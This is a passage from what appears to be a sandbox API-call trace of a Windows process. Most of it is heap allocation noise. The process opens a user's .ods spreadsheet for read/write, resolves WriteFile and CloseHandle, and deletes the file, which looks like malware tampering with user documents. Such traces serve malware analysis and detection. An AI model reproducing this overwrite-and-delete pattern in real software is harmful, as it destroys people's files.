(HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.617] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.617] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889538 [0033.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x889538, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0033.617] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\bn3xfsxkp2nprmt.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.618] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.618] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.618] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.618] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.618] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x8896a0 [0033.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x8896a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0033.619] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0033.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0033.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.619] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.620] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c730 [0033.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.620] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.620] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.620] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods", lpFilePart=0x0) returned 0x5e [0033.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c542c70, ftCreationTime.dwHighDateTime=0x1d5bccb, ftLastAccessTime.dwLowDateTime=0x14867a70, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0x13ebf1c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x4911, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="BN3xfsXKP2npRmT.ods", cAlternateFileName="BN3XFS~1.ODS")) returned 0x7c2240 [0033.621] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\bn3xfsxkp2nprmt.ods")) returned 1 [0033.622] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c542c70, ftCreationTime.dwHighDateTime=0x1d5bccb, ftLastAccessTime.dwLowDateTime=0x14867a70, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0x13ebf1c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x4911, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="BN3xfsXKP2npRmT.ods", cAlternateFileName="BN3XFS~1.ODS")) returned 0 [0033.622] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.622] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.623] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0033.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.624] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.624] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.625] HeapFree 